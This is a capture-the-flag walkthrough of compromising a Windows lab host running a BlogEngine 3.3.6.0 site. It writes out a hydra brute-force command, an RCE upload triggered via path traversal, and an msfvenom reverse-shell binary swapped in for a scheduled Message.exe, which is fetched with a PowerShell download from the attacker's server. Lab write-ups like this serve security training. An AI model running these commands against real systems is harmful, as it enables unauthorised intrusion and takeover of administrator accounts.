Target IP: 10.10.83.156
Challenge Description:
I wish to complete this CTF without the use of Metasploit tool. There are two TCP ports open on the target machine, as shown above. They are HTTP and RDP applications on the standard ports.
Performing an aggressive port scan against the two TCP ports returns the result above. By the looks of it, the target machine is running Windows OS. And the HTTP application on port 80 is running IIS httpd 8.5. The scan above also found interesting entries inside the robots.txt.
Port 80: HTTP
The webpage above is displayed for this web application. It has a picture of Pennywise from the movive IT. The post above was created by the user administrator.
The source-code of this webpage contains the application name & version BlogEngine 3.3.6.0, as shown above. Other than that, I did not find anything important.
Doing a Google search for exploits for this application version shows it is vulnerable to RCE, but I need a way to upload this exploit. The goal now is to exploit the web application. Maybe that will allow me to upload the exploit? This exploit has the requirement: it needs to be uploaded as the file name PostView.ascx, with the correct IP & port to pointing to my machine. Time to enumerate further now.
Pressing the hamburger icon shows more options. There is a login option too, as shown above.
After pressing the Log In button from the previous image returns the login portal webpage shown above. I tried different default credentials such as admin:admin and admin:Passw@rd123, but I had no luck. Time to bruteforce it. From previous enumeration, I noticed a username called administrator who made the single post. Maybe I can bruteforce the password of the user admin or administrator?
I bruteforced the password 1qaz2wsx of the user admin using hydra, as shown above. The command I used is hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.83.156 http-post-form "/Account/login.aspx:__VIEWSTATE=1ZvQI0yKa1Blq4poeOhGvamUIlwpiuSuB0urhyfFUnK3dOg1%2F5KjpoevirBngbho0kYzeNKx5OlbGFT5IG7mO6wA5Ow5851Ji8O%2BXIgukfzyjp39nbTuI4MhPs4iMDdOEN%2FVKmjB4HfEp7QlU20obBDbNkqnvePduK8xAMDYRmToj8KqjQG9utYGzlVg15r73ZTdFNNdoyCZSIo%2FlT7I1M77y%2B2YkDmvuWEL%2BzF56iCpsjSzx59KQauejt%2BsQNsHa2559KC%2FC0Bm6OCyna0UG1R4WtBjhARum0r7xDtdLiUzW%2F%2BQNw8ZRlfEUmMfpA9WMlV7p5CtdYlmq3dkLcd%2BBIi3DEb6yImh4u6yO4maSjma%2F3Eo&__EVENTVALIDATION=cO2tDGMv1FACB7SwdzzFZZCFTktQOr5X2obAnQ3f%2Fr47dIOHIBO2tn2iVUnijn94dTOug4cWzYhXcqGykfKFQnXGADfTYENyakP93yvwD88F6jmH3o%2B7reKNCcdx2FN39sW%2F7%2BYdt5lAQVpCbYyiWzKbDTmqAd0JZk5MGWG26xtwE1PV&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed".I captured the full parameters of the HTTP request using the dev tool of the Mozilla browser.
After logging in with the credentials admin:1qaz2wsx, the same webpage above was returned to me. The web application did not inform the login was successful.
However, pressing the hamburger option shows a new option called Admin as shown above. Is this the admin login portal? Can I upload the exploit here?
And pressing the Admin button from the previous image loads up the webpage above. Now I have access to the administrator panel of the web application. Maybe I can run the exploit I found earlier now against the target machine?
More information about the target machine & web application is displayed above.
I downloaded a copy of the exploit I found previously. Then I changed the IP & port number to point to my machine at line fifty-one on the exploit. I also changed the name of this file to PostView.ascx as mentioned in the PoC.
I created a new post called Test as shown above. Then I uploaded the malicious reverse shell exploit with the name PostView.ascx using the File Manager option inside this new post. After this, I started a listener on my machine at port 8443.
And I browsed to http://10.10.83.156/?theme=../../App_Data/files to start the reverse shell connection. I successfully obtained a reverse shell connection from the target machine on my machine at port 8443 with the session as iis apppool\blog. Now I have a foothold on the target machine. I tried to obtain a Powershell session by modifying the exploit, but I had no luck.
There is one local user with the name jeff, but I am unable to access this user's files. I will need to escalate privileges first to obtain the local.txt flag.
After some manual enumeration, I noticed the unusual directory with the name SystemScheduler as shown above.
I found an interesting log file called 20198415519.INI_LOG.txt. This log file contains the juicy information above. It looks like the application Message.exe is executed as the user Administrator. Maybe I can replace the Message.exe with a malicious version to obtain a reverse shell connection with administrator privileges?
Running icacls Message.exe shows the permission Everyone:(I)(M) for every other user. Does this mean I can modify this binary and replace it with a malicious reverse shell? Currently, I have a session on the target machine as iis apppool\blog. Can I modify this binary file as this user?
Using the command del Message.exe inside the c:\Program Files (x86)\SystemScheduler directory proves true, as I can remove the executable file. Time to create a malicious executable file to obtain a reverse shell connection. The target machine is running x64 archtecture according to systeminfo.
I had VPN issues, so I had to reset the box. The target machine obtained the new IP 10.10.15.106. And I generated the malicious executable reverse shell file with the name Message.exe as shown above. To generate this, I used the command msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.55.153 LPORT=8444 -f exe -o Message.exe as shown above. This payload will invoke a reverse shell connection to my machine at port 8444.
I started a Python HTTP server on my machine to serve this malicious file to the target machine. Using the command powershell -c "iwr -uri http://10.14.55.153/Message.exe -Outfile Message.exe", I downloaded the malicious executable file on the target machine via my Python HTTP server.
I started a listener on my machine at port 8444. Then after waiting for some time, I obtained a reverse shell connection from the target machine as shown above.
Running powershell -c "whoami" shows the session belongs to the user administrator on the target machine. Now I have administrator access on the target machine. Game over.
The user.txt flag is shown above. This flag is located at the Desktop of user jeff.
The root.txt flag is shown above. This flag is located at the Desktop of user Administrator.